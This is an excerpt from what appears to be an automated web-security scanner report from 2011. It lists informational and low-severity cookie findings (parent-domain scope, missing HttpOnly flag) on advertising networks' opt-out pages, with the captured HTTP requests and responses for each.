Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rp.gwallet.com/r1/optout?check&rand=1321210456912
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 12-Nov-2012 18:54:16 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=OTX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 13-Nov-2016 18:54:16 GMT; Path=/; Domain=gwallet.com; Version=1


5.46. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=11&ti=5&nocache=0.301791 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgbi=1; lgtix=HAA3AGQB/QAGAGsBXwABAGQBcxwBAHcB; lgsp=VWR8KncB

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:50:53 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Set-Cookie: lgtix=BQACAHkBHAA3AGQB/QAGAGsBXwABAGQBcxwBAHcB; path=/; expires=Wed, 12 Nov 2014 18:50:53 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 1
Connection: close
Content-Type: text/html; charset=iso-8859-1


5.47. http://s.xp1.ru4.com/coop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /coop

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coop?action_id=4&version=old&nocache=0.69723 HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 13 Nov 2011 18:53:48 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Set-cookie: X1ID=OO-00000000000000000; domain=.ru4.com; path=/; expires=Sun, 13-Nov-2041 13:53:48 GMT
Location: http://s.xp1.ru4.com/coop?action_id=4&version=old&test_flag=1
Content-length: 0
X-Cnection: close


5.48. http://www.adbrite.com/mb/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /mb/nai_optout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mb/nai_optout.php?nocache=0.4172414 HTTP/1.1
Host: www.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A15hai%2C13lfy%2Cx4co%2C163rx%2C13wid%2C13beg%2C15sx4"

Response

HTTP/1.1 302 Found
Content-Type: text/html
Date: Sun, 13 Nov 2011 18:53:43 GMT
Location: http://www.adbrite.com/mb/nai_optout.php?set=yes
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache
Set-Cookie: ut=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=.adbrite.com
Set-Cookie: b=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=.adbrite.com
Set-Cookie: untarget=1; expires=Wed, 10-Nov-2021 18:53:43 GMT; path=/; domain=adbrite.com
Content-Length: 0


5.49. http://www.addthis.com/api/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/nai/optout?nocache=0.5840976 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: uid=0000000000000000; expires=Wed, 10-Nov-2021 18:53:42 GMT; path=/; domain=.addthis.com
Set-Cookie: loc=deleted; expires=Sat, 13-Nov-2010 18:53:41 GMT; path=/; domain=.addthis.com
Set-Cookie: uvc=deleted; expires=Sat, 13-Nov-2010 18:53:41 GMT; path=/; domain=.addthis.com
Location: /api/nai/optout-verify
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


5.50. http://www.bizographics.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /nai/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/optout?nocache=0.2636576 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 13 Nov 2011 18:53:43 GMT
Location: http://www.bizographics.com/nai/checkoptout
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/1.0.4
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 13-Nov-2011 18:53:44 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 13-Nov-2011 18:53:44 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 13-Nov-2011 18:53:44 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 13-Nov-2011 18:53:44 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 11-Nov-2016 18:53:43 GMT; Path=/
Content-Length: 0
Connection: keep-alive


5.51. http://www.burstnet.com/cgi-bin/opt_out.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/opt_out.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/opt_out.cgi?nocache=0.2463401 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOO=opt-out

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Location: /cgi-bin/opt_out_verify.cgi
Content-Type: text/plain
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:42 GMT
Connection: close
Set-Cookie: CMS=1; domain=.burstnet.com; path=/; expires=Mon, 15-Aug-2011 18:53:42 GMT
Set-Cookie: CMP=1; domain=.burstnet.com; path=/; expires=Mon, 15-Aug-2011 18:53:42 GMT
Set-Cookie: TData=1; domain=.burstnet.com; path=/; expires=Mon, 15-Aug-2011 18:53:42 GMT
Set-Cookie: TID=1; domain=.burstnet.com; path=/; expires=Mon, 15-Aug-2011 18:53:42 GMT
Set-Cookie: BOO=opt-out; domain=.burstnet.com; path=/; expires=Fri, 11-Nov-2016 18:53:42 GMT


5.52. http://www.facebook.com/TurnInc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /TurnInc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TurnInc HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: datr=qBLATucyC1LUOzkQJKGOGIHR; expires=Tue, 12-Nov-2013 18:55:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FTurnInc; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FTurnInc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.202.220
Connection: close
Date: Sun, 13 Nov 2011 18:55:36 GMT
Content-Length: 200859

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://ogp.me/ns#" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...

5.53. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-type: text/html;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: datr=qBLATv0FF6pQPL9BUXOsHNu5; expires=Tue, 12-Nov-2013 18:55:36 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.36.129.114
Connection: close
Date: Sun, 13 Nov 2011 18:55:36 GMT
Content-Length: 1693

<html><head><title>Redirecting...</title><script>window._incorporate_fragment = true;</script><script type="text/javascript">function incorporate_fragment(a){var c=/^(?:(?:[^:\/?#]+):)?(?:\/\/(?:[^\/?
...[SNIP]...

5.54. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_pure.php?nocache=0.9027664 HTTP/1.1
Host: www.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sun, 13 Nov 2011 18:54:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: /optout_pure.php?cookie_test=true
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Nov 2011 18:54:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Nov 2011 18:54:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: svid=OPT-OUT; expires=Wed, 10-Nov-2021 18:54:19 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>

5.55. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout_pure.php?cookie_test=true HTTP/1.1
Host: www.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex; svid=OPT-OUT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sun, 13 Nov 2011 18:54:21 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Nov 2011 18:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Nov 2011 18:54:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mojo1=deleted; expires=Sat, 13-Nov-2010 18:54:20 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo2=deleted; expires=Sat, 13-Nov-2010 18:54:20 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo3=deleted; expires=Sat, 13-Nov-2010 18:54:20 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>

5.56. http://www.nexac.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai_optout.php?nocache=0.5815065 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=ignore; na_tc=Y

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml",CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo IVAa IVDa HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=ignore; expires=Fri, 21-Apr-2028 18:53:44 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Location: http://www.nexac.com/nai_verify.php
Content-type: text/html
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:44 GMT
Server: lighttpd/1.4.18


6. Cookie without HttpOnly flag set  previous  next
There are 72 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=110531375
Location: http://advertising.aol.com/token/4/1/110531375/
Content-Length: 0
Content-Type: text/html


6.2. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1031235455
Location: http://advertising.aol.com/token/5/1/1031235455/
Content-Length: 0
Content-Type: text/html


6.3. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:15 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=2022630013
Location: http://advertising.aol.com/token/6/1/2022630013/
Content-Length: 0
Content-Type: text/html


6.4. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=707188219
Location: http://advertising.aol.com/token/7/1/707188219/
Content-Length: 0
Content-Type: text/html


6.5. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1592438477
Location: http://advertising.aol.com/token/1/3/1592438477/
Content-Length: 0
Content-Type: text/html


6.6. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1894403391
Location: http://advertising.aol.com/token/3/1/1894403391/
Content-Length: 0
Content-Type: text/html


6.7. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
